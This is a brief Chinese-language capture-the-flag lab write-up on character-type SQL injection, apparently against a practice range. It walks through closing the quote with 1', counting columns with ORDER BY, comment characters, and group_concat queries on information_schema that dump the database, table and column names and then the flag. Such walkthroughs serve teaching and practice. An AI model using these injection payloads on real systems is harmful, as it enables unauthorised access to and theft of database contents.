进入靶场，按照提示输入1

对比字符型注入与整数型注入可以发现字符型注入的1被单引号包裹

所以我们要使单引号闭合，使语句正确

如图，手动输入时便输入1'，先使得第一个单引号闭合，使用order by 判断字节数，还需要解决后单引号，#或-- -或-- +都能起到注释作用，使其后语句不执行，上3张图为-- -，下2张图为#，效果相同，都能判断出最后字节数为2，因为1，2时回显正常，3时异常

寻找回显点

database（）

爆出库名为sqli

group_concat(table_name) from information_schema.tables where table_schema='sqli'#

爆出表名为flag与news，flag更可疑

group_concat(column_name) from information_schema.columns where table_name='flag'#

字段名还是flag

group_concat(flag) from sqli.flag#

得到flag

笔记

1，字符型注入要闭合单引号或注释掉

2，注释符有#，-- -，-- +